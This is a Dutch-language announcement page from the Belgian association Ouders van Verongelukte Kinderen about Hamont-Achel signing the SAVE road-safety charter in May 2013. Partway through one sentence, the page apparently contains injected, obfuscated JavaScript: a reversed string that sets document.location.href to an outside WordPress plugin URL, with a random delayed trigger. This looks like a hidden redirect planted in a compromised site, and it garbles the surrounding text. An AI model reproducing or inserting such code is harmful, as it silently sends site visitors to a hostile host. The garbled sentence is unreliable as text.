Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Hamont-Achel ondertekent SAVE-charter

Op donderdag 30 mei 2013 zal de stad Hamont-Achel het SAVE-charter Steden & Gemeenten officieel ondertekenen. Hamont-Achel wordt zo de 18de Vlaamse gemeente die het engagement aangaat om een actieplan verkeersveiligheid op te stellen, in samenwerking met OVK.

U wordt vriendelijk uitgenodigd deze ondertekening bij te wonen op donderdag 30 mei om 19uur in het stadhuis van Hamont-Achel, Stad 40. Dit geeft u de gelegenheid kennis te maken met deze nieuwe actie van de vereniging. Aansluitend wordt door het gemeentebestuur een drankje aangeboden.

De aanwezigheid van OVK-leden op een ondertekening moedigt het gemeentebestuur extra aan om het project toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een goed einde te brengen.

Meer informatie over OVK en de SAVE-acties van de vereniging vindt u hier.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be